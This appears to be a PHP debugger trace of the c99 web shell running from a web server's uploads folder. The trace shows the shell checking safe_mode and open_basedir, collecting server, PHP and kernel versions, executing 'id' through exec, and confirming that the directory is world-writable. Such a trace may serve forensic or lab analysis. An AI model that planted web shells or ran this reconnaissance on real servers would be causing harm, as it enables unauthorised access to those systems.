2	91	1	0.008985	1338360
2	91	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	849	$tmpdir = '/var/www/html/uploads'
2	92	0	0.009010	1338264	substr	0		/var/www/html/uploads/c99_php7.4.php	850	2	'/var/www/html/uploads'	-1
2	92	1	0.009024	1338328
2	92	R			's'
1		A						/var/www/html/uploads/c99_php7.4.php	850	$tmpdir .= '/'
1		A						/var/www/html/uploads/c99_php7.4.php	851	$tmpdir_logs = '/var/www/html/uploads/'
2	93	0	0.009058	1338264	ini_get	0		/var/www/html/uploads/c99_php7.4.php	853	1	'safe_mode'
2	93	1	0.009071	1338296
2	93	R			FALSE
2	94	0	0.009084	1338264	ini_get	0		/var/www/html/uploads/c99_php7.4.php	853	1	'safe_mode'
2	94	1	0.009096	1338296
2	94	R			FALSE
2	95	0	0.009108	1338264	strtolower	0		/var/www/html/uploads/c99_php7.4.php	853	1	FALSE
2	95	1	0.009121	1338296
2	95	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	858	$safemode = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	858	$hsafemode = '<font color=green>Off (no security)</font>'
2	96	0	0.009156	1338264	ini_get	0		/var/www/html/uploads/c99_php7.4.php	859	1	'open_basedir'
2	96	1	0.009169	1338296
2	96	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	859	$v = ''
2	97	0	0.009191	1338264	strtolower	0		/var/www/html/uploads/c99_php7.4.php	860	1	''
2	97	1	0.009203	1338296
2	97	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	861	$openbasedir = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	861	$hopenbasedir = '<font color=green>Off (no security)</font>'
2	98	0	0.009239	1338264	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	862	1	NULL
2	98	1	0.009253	1338456
2	98	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	862	$sort = ''
1		A						/var/www/html/uploads/c99_php7.4.php	863	$sort = '0a'
2	99	0	0.009286	1338264	strtolower	0		/var/www/html/uploads/c99_php7.4.php	864	1	'a'
2	99	1	0.009298	1338296
2	99	R			'a'
1		A						/var/www/html/uploads/c99_php7.4.php	864	$sort[1] = 'a'
2	100	0	0.009321	1338296	getenv	0		/var/www/html/uploads/c99_php7.4.php	865	1	'SERVER_SOFTWARE'
2	100	1	0.009335	1338376
2	100	R			'Apache/2.4.52 (Ubuntu)'
1		A						/var/www/html/uploads/c99_php7.4.php	865	$DISP_SERVER_SOFTWARE = 'Apache/2.4.52 (Ubuntu)'
2	101	0	0.009363	1338344	phpversion	0		/var/www/html/uploads/c99_php7.4.php	866	0
2	101	1	0.009374	1338408
2	101	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	102	0	0.009389	1338424	strstr	0		/var/www/html/uploads/c99_php7.4.php	866	2	'Apache/2.4.52 (Ubuntu)'	'PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	102	1	0.009405	1338496
2	102	R			FALSE
2	103	0	0.009418	1338344	phpversion	0		/var/www/html/uploads/c99_php7.4.php	866	0
2	103	1	0.009430	1338408
2	103	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
1		A						/var/www/html/uploads/c99_php7.4.php	866	$DISP_SERVER_SOFTWARE .= '. PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	104	0	0.009459	1338392	phpversion	0		/var/www/html/uploads/c99_php7.4.php	867	0
2	104	1	0.009470	1338456
2	104	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	105	0	0.009485	1338552	phpversion	0		/var/www/html/uploads/c99_php7.4.php	867	0
2	105	1	0.009496	1338616
2	105	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	106	0	0.009511	1338600	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	867	1	'Apache/2.4.52 (Ubuntu). PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	106	1	0.009528	1338792
2	106	R			'Apache/2.4.52 (Ubuntu). PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	107	0	0.009545	1338760	str_replace	0		/var/www/html/uploads/c99_php7.4.php	867	3	'PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'	'<a href="?act=phpinfo" target="_blank"><b><u>PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1</u></b></a>'	'Apache/2.4.52 (Ubuntu). PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	107	1	0.009565	1339016
2	107	R			'Apache/2.4.52 (Ubuntu). <a href="?act=phpinfo" target="_blank"><b><u>PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1</u></b></a>'
1		A						/var/www/html/uploads/c99_php7.4.php	867	$DISP_SERVER_SOFTWARE = 'Apache/2.4.52 (Ubuntu). <a href="?act=phpinfo" target="_blank"><b><u>PHP/7.2.34-37+ubuntu22.04.1+deb.sury.org+1</u></b></a>'
2	108	0	0.009607	1338456	ini_set	0		/var/www/html/uploads/c99_php7.4.php	868	2	'highlight.bg'	'#FFFFFF'
2	108	1	0.009624	1338528
2	108	R			FALSE
2	109	0	0.009637	1338456	ini_set	0		/var/www/html/uploads/c99_php7.4.php	869	2	'highlight.comment'	'#6A6A6A'
2	109	1	0.009652	1338560
2	109	R			'#FF8000'
2	110	0	0.009718	1338456	ini_set	0		/var/www/html/uploads/c99_php7.4.php	870	2	'highlight.default'	'#0000BB'
2	110	1	0.009734	1338560
2	110	R			'#0000BB'
2	111	0	0.009747	1338456	ini_set	0		/var/www/html/uploads/c99_php7.4.php	871	2	'highlight.html'	'#1300FF'
2	111	1	0.009761	1338880
2	111	R			'#000000'
2	112	0	0.009775	1338776	ini_set	0		/var/www/html/uploads/c99_php7.4.php	872	2	'highlight.keyword'	'#007700'
2	112	1	0.009788	1338880
2	112	R			'#007700'
2	113	0	0.009801	1338776	ini_set	0		/var/www/html/uploads/c99_php7.4.php	873	2	'highlight.string'	'#000000'
2	113	1	0.009815	1338880
2	113	R			'#DD0000'
1		A						/var/www/html/uploads/c99_php7.4.php	874	$actbox = []
2	114	0	0.009841	1338776	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	875	1	NULL
2	114	1	0.009855	1338968
2	114	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	875	$act = ''
1		A						/var/www/html/uploads/c99_php7.4.php	875	$dspact = ''
1		A						/var/www/html/uploads/c99_php7.4.php	876	$notls = NULL
1		A						/var/www/html/uploads/c99_php7.4.php	876	$ls_arr = NULL
1		A						/var/www/html/uploads/c99_php7.4.php	876	$disp_fullpath = NULL
2	115	0	0.009917	1338936	urlencode	0		/var/www/html/uploads/c99_php7.4.php	877	1	NULL
2	115	1	0.009929	1339000
2	115	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	877	$ud = ''
2	116	0	0.009952	1338968	getenv	0		/var/www/html/uploads/c99_php7.4.php	880	1	'HTTP_HOST'
2	116	1	0.009966	1339040
2	116	R			'localhost'
2	117	0	0.009982	1338968	php_uname	0		/var/www/html/uploads/c99_php7.4.php	896	0
2	117	1	0.009996	1339080
2	117	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	118	0	0.010014	1339080	wordwrap	0		/var/www/html/uploads/c99_php7.4.php	896	4	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	90	'<br>'	1
2	118	1	0.010033	1339320
2	118	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	119	0	0.010052	1338968	myshellexec	1		/var/www/html/uploads/c99_php7.4.php	896	1	'id'
2		A						/var/www/html/uploads/c99_php7.4.php	429	$result = ''
3	120	0	0.010076	1338992	is_callable	0		/var/www/html/uploads/c99_php7.4.php	432	1	'exec'
3	120	1	0.010089	1339024
3	120	R			TRUE
3	121	0	0.010102	1338992	in_array	0		/var/www/html/uploads/c99_php7.4.php	432	2	'exec'	[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
3	121	1	0.010135	1339064
3	121	R			FALSE
3	122	0	0.010149	1339016	exec	0		/var/www/html/uploads/c99_php7.4.php	432	2	'id'	''
3	122	1	0.011682	1339616
3	122	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3	123	0	0.011708	1339472	join	0		/var/www/html/uploads/c99_php7.4.php	432	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
3	123	1	0.011727	1339536
3	123	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/c99_php7.4.php	432	$result = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	119	1	0.011757	1339072
2	119	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	124	0	0.011774	1339072	wordwrap	0		/var/www/html/uploads/c99_php7.4.php	896	4	'uid=33(www-data) gid=33(www-data) groups=33(www-data)'	90	'<br>'	1
2	124	1	0.011830	1339280
2	124	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	125	0	0.011850	1338992	str_replace	0		/var/www/html/uploads/c99_php7.4.php	898	3	'\\'	'/'	NULL
2	125	1	0.011865	1339088
2	125	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	898	$d = ''
2	126	0	0.011890	1338992	realpath	0		/var/www/html/uploads/c99_php7.4.php	899	1	'.'
2	126	1	0.011905	1339072
2	126	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	899	$d = '/var/www/html/uploads'
2	127	0	0.011936	1339040	str_replace	0		/var/www/html/uploads/c99_php7.4.php	900	3	'\\'	'/'	'/var/www/html/uploads'
2	127	1	0.011950	1339136
2	127	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	900	$d = '/var/www/html/uploads'
2	128	0	0.011974	1339040	substr	0		/var/www/html/uploads/c99_php7.4.php	901	2	'/var/www/html/uploads'	-1
2	128	1	0.011988	1339104
2	128	R			's'
1		A						/var/www/html/uploads/c99_php7.4.php	901	$d .= '/'
2	129	0	0.012011	1339040	str_replace	0		/var/www/html/uploads/c99_php7.4.php	902	3	'\\\\'	'\\'	'/var/www/html/uploads/'
2	129	1	0.012025	1339136
2	129	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/c99_php7.4.php	902	$d = '/var/www/html/uploads/'
2	130	0	0.012050	1339040	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	903	1	'/var/www/html/uploads/'
2	130	1	0.012064	1339232
2	130	R			'/var/www/html/uploads/'
1		A						/var/www/html/uploads/c99_php7.4.php	903	$dispd = '/var/www/html/uploads/'
2	131	0	0.012089	1339200	substr	0		/var/www/html/uploads/c99_php7.4.php	904	3	'/var/www/html/uploads/'	0	-1
2	131	1	0.012102	1339344
2	131	R			'/var/www/html/uploads'
2	132	0	0.012116	1339248	explode	0		/var/www/html/uploads/c99_php7.4.php	904	2	'/'	'/var/www/html/uploads'
2	132	1	0.012130	1339824
2	132	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/c99_php7.4.php	904	$e = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/c99_php7.4.php	904	$pd = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1		A						/var/www/html/uploads/c99_php7.4.php	905	$i = 0
1		A						/var/www/html/uploads/c99_php7.4.php	908	$t = ''
1		A						/var/www/html/uploads/c99_php7.4.php	909	$j = 0
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= '/'
2	133	0	0.012214	1339784	urlencode	0		/var/www/html/uploads/c99_php7.4.php	916	1	'/'
2	133	1	0.012227	1339848
2	133	R			'%2F'
2	134	0	0.012241	1339800	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	916	1	''
2	134	1	0.012254	1339992
2	134	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	917	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	908	$t = ''
1		A						/var/www/html/uploads/c99_php7.4.php	909	$j = 0
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= '/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'var/'
2	135	0	0.012324	1339784	urlencode	0		/var/www/html/uploads/c99_php7.4.php	916	1	'/var/'
2	135	1	0.012337	1339856
2	135	R			'%2Fvar%2F'
2	136	0	0.012351	1339816	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	916	1	'var'
2	136	1	0.012363	1340008
2	136	R			'var'
1		A						/var/www/html/uploads/c99_php7.4.php	917	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	908	$t = ''
1		A						/var/www/html/uploads/c99_php7.4.php	909	$j = 0
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= '/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'var/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'www/'
2	137	0	0.012455	1339792	urlencode	0		/var/www/html/uploads/c99_php7.4.php	916	1	'/var/www/'
2	137	1	0.012469	1339864
2	137	R			'%2Fvar%2Fwww%2F'
2	138	0	0.012483	1339824	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	916	1	'www'
2	138	1	0.012495	1340016
2	138	R			'www'
1		A						/var/www/html/uploads/c99_php7.4.php	917	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	908	$t = ''
1		A						/var/www/html/uploads/c99_php7.4.php	909	$j = 0
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= '/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'var/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'www/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'html/'
2	139	0	0.012594	1339792	urlencode	0		/var/www/html/uploads/c99_php7.4.php	916	1	'/var/www/html/'
2	139	1	0.012611	1339872
2	139	R			'%2Fvar%2Fwww%2Fhtml%2F'
2	140	0	0.012626	1339824	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	916	1	'html'
2	140	1	0.012639	1340016
2	140	R			'html'
1		A						/var/www/html/uploads/c99_php7.4.php	917	$i++
1		A						/var/www/html/uploads/c99_php7.4.php	908	$t = ''
1		A						/var/www/html/uploads/c99_php7.4.php	909	$j = 0
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= '/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'var/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'www/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'html/'
1		A						/var/www/html/uploads/c99_php7.4.php	914	$j++
1		A						/var/www/html/uploads/c99_php7.4.php	912	$t .= 'uploads/'
2	141	0	0.012753	1339800	urlencode	0		/var/www/html/uploads/c99_php7.4.php	916	1	'/var/www/html/uploads/'
2	141	1	0.012767	1339896
2	141	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	142	0	0.012782	1339848	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	916	1	'uploads'
2	142	1	0.012795	1340040
2	142	R			'uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	917	$i++
2	143	0	0.012818	1339752	is_writable	0		/var/www/html/uploads/c99_php7.4.php	920	1	'/var/www/html/uploads/'
2	143	1	0.012836	1339792
2	143	R			TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	922	$wd = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	923	$wdt = '<font color=green> [ ok ] </font>'
2	144	0	0.012872	1339752	fileperms	0		/var/www/html/uploads/c99_php7.4.php	924	1	'/var/www/html/uploads/'
2	144	1	0.012887	1339816
2	144	R			16895
2	145	0	0.012901	1339776	view_perms	1		/var/www/html/uploads/c99_php7.4.php	924	1	16895
2		A						/var/www/html/uploads/c99_php7.4.php	452	$type = 'd'
2		A						/var/www/html/uploads/c99_php7.4.php	460	$owner['read'] = 'r'
2		A						/var/www/html/uploads/c99_php7.4.php	461	$owner['write'] = 'w'
2		A						/var/www/html/uploads/c99_php7.4.php	462	$owner['Uygulanamadi!'] = 'x'
2		A						/var/www/html/uploads/c99_php7.4.php	463	$group['read'] = 'r'
2		A						/var/www/html/uploads/c99_php7.4.php	464	$group['write'] = 'w'
2		A						/var/www/html/uploads/c99_php7.4.php	465	$group['Uygulanamadi!'] = 'x'
2		A						/var/www/html/uploads/c99_php7.4.php	466	$world['read'] = 'r'
2		A						/var/www/html/uploads/c99_php7.4.php	467	$world['write'] = 'w'
2		A						/var/www/html/uploads/c99_php7.4.php	468	$world['Uygulanamadi!'] = 'x'
3	146	0	0.013024	1340904	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
3	146	1	0.013042	1341000
3	146	R			'rwx'
3	147	0	0.013055	1340936	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
3	147	1	0.013072	1341032
3	147	R			'rwx'
3	148	0	0.013085	1340936	join	0		/var/www/html/uploads/c99_php7.4.php	474	2	''	['read' => 'r', 'write' => 'w', 'Uygulanamadi!' => 'x']
3	148	1	0.013101	1341032
3	148	R			'rwx'
2	145	1	0.013114	1339816
2	145	R			'drwxrwxrwx'
2	149	0	0.013128	1339776	is_callable	0		/var/www/html/uploads/c99_php7.4.php	932	1	'disk_free_space'
2	149	1	0.013141	1339808
2	149	R			TRUE
2	150	0	0.013153	1339776	disk_free_space	0		/var/www/html/uploads/c99_php7.4.php	934	1	'/var/www/html/uploads/'
2	150	1	0.013169	1339808
2	150	R			194720038912
1		A						/var/www/html/uploads/c99_php7.4.php	934	$free = 194720038912
2	151	0	0.013194	1339776	disk_total_space	0		/var/www/html/uploads/c99_php7.4.php	935	1	'/var/www/html/uploads/'
2	151	1	0.013208	1339808
2	151	R			232015802368
1		A						/var/www/html/uploads/c99_php7.4.php	935	$total = 232015802368
1		A						/var/www/html/uploads/c99_php7.4.php	940	$used = 37295763456
2	152	0	0.013243	1339776	round	0		/var/www/html/uploads/c99_php7.4.php	941	2	83.925334793858	2
2	152	1	0.013258	1339848
2	152	R			83.93
1		A						/var/www/html/uploads/c99_php7.4.php	941	$free_percent = 83.93
2	153	0	0.013281	1339776	view_size	1		/var/www/html/uploads/c99_php7.4.php	942	1	232015802368
3	154	0	0.013298	1339776	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	304	1	232015802368
3	154	1	0.013311	1339808
3	154	R			TRUE
3	155	0	0.013325	1339776	round	0		/var/www/html/uploads/c99_php7.4.php	307	1	21608.155441284
3	155	1	0.013338	1339808
3	155	R			21608
2		A						/var/www/html/uploads/c99_php7.4.php	307	$size = '216.08 GB'
2	153	1	0.013363	1339816
2	153	R			'216.08 GB'
2	156	0	0.013377	1339840	view_size	1		/var/www/html/uploads/c99_php7.4.php	942	1	194720038912
3	157	0	0.013390	1339840	is_numeric	0		/var/www/html/uploads/c99_php7.4.php	304	1	194720038912
3	157	1	0.013403	1339872
3	157	R			TRUE
3	158	0	0.013415	1339840	round	0		/var/www/html/uploads/c99_php7.4.php	307	1	18134.716796875
3	158	1	0.013427	1339872
3	158	R			18135
2		A						/var/www/html/uploads/c99_php7.4.php	307	$size = '181.35 GB'
2	156	1	0.013452	1339880
2	156	R			'181.35 GB'
1		A						/var/www/html/uploads/c99_php7.4.php	945	$letters = ''
2	159	0	0.013478	1339776	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	159	1	0.013491	1339872
2	159	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	160	0	0.013507	1339840	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?'
2	160	1	0.013522	1339936
2	160	R			'?'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?'
2	161	0	0.013546	1340152	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?'
2	161	1	0.013559	1340248
2	161	R			'?'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?'
2	162	0	0.013583	1340208	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	162	1	0.013596	1340280
2	162	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	163	0	0.013621	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	163	1	0.013633	1340272
2	163	R			'%2Fvar%2Fwww%2Fhtml'
2	164	0	0.013647	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?'
2	164	1	0.013662	1340336
2	164	R			'?'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?'
2	165	0	0.013686	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	165	1	0.013699	1339912
2	165	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	166	0	0.013714	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'#" onclick="history.back(1)'
2	166	1	0.013730	1339976
2	166	R			'#" onclick="history.back(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '#" onclick="history.back(1)'
2	167	0	0.013757	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'#" onclick="history.back(1)'
2	167	1	0.013773	1340288
2	167	R			'#" onclick="history.back(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '#" onclick="history.back(1)'
2	168	0	0.013799	1340248	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	168	1	0.013812	1340320
2	168	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	169	0	0.013836	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	169	1	0.013849	1340272
2	169	R			'%2Fvar%2Fwww%2Fhtml'
2	170	0	0.013863	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'#" onclick="history.back(1)'
2	170	1	0.013879	1340336
2	170	R			'#" onclick="history.back(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '#" onclick="history.back(1)'
2	171	0	0.013906	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	171	1	0.013919	1339912
2	171	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	172	0	0.013934	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'#" onclick="history.go(1)'
2	172	1	0.013950	1339976
2	172	R			'#" onclick="history.go(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '#" onclick="history.go(1)'
2	173	0	0.013980	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'#" onclick="history.go(1)'
2	173	1	0.013996	1340288
2	173	R			'#" onclick="history.go(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '#" onclick="history.go(1)'
2	174	0	0.014022	1340248	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	174	1	0.014035	1340320
2	174	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	175	0	0.014059	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	175	1	0.014072	1340272
2	175	R			'%2Fvar%2Fwww%2Fhtml'
2	176	0	0.014086	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'#" onclick="history.go(1)'
2	176	1	0.014101	1340336
2	176	R			'#" onclick="history.go(1)'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '#" onclick="history.go(1)'
2	177	0	0.014128	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	177	1	0.014141	1339912
2	177	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	178	0	0.014156	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=ls&d=%upd&sort=%sort'
2	178	1	0.014172	1339976
2	178	R			'?act=ls&d=%upd&sort=%sort'
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = '?act=ls&d=%upd&sort=%sort'
2	179	0	0.014199	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	'?act=ls&d=%upd&sort=%sort'
2	179	1	0.014213	1340336
2	179	R			'?act=ls&d=%upd&sort=0a'
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = '?act=ls&d=%upd&sort=0a'
2	180	0	0.014240	1340296	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	180	1	0.014252	1340368
2	180	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	181	0	0.014276	1340240	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	181	1	0.014289	1340320
2	181	R			'%2Fvar%2Fwww%2Fhtml'
2	182	0	0.014303	1340288	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	'?act=ls&d=%upd&sort=0a'
2	182	1	0.014318	1340448
2	182	R			'?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a'
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = '?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a'
2	183	0	0.014346	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	183	1	0.014359	1339912
2	183	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	184	0	0.014374	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	''
2	184	1	0.014388	1339976
2	184	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	968	$item[1] = ''
2	185	0	0.014412	1340192	str_replace	0		/var/www/html/uploads/c99_php7.4.php	969	3	'%sort'	'0a'	''
2	185	1	0.014425	1340288
2	185	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	969	$item[1] = ''
2	186	0	0.014448	1340248	realpath	0		/var/www/html/uploads/c99_php7.4.php	970	1	'/var/www/html/uploads/..'
2	186	1	0.014461	1340320
2	186	R			'/var/www/html'
1		A						/var/www/html/uploads/c99_php7.4.php	970	$v = '/var/www/html'
2	187	0	0.014485	1340192	urlencode	0		/var/www/html/uploads/c99_php7.4.php	972	1	'/var/www/html'
2	187	1	0.014498	1340272
2	187	R			'%2Fvar%2Fwww%2Fhtml'
2	188	0	0.014511	1340240	str_replace	0		/var/www/html/uploads/c99_php7.4.php	972	3	'%upd'	'%2Fvar%2Fwww%2Fhtml'	''
2	188	1	0.014525	1340336
2	188	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	972	$item[1] = ''
2	189	0	0.014549	1339816	urlencode	0		/var/www/html/uploads/c99_php7.4.php	968	1	'/var/www/html/uploads/'
2	189	1	0.014562	1339912
2	189	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	190	0	0.014577	1339880	str_replace	0		/var/www/html/uploads/c99_php7.4.php	968	3	'%d'	'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'	'?act=search&d=%d'
2	190	1	0.014592	1340056
2	190	R			'?act=search&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
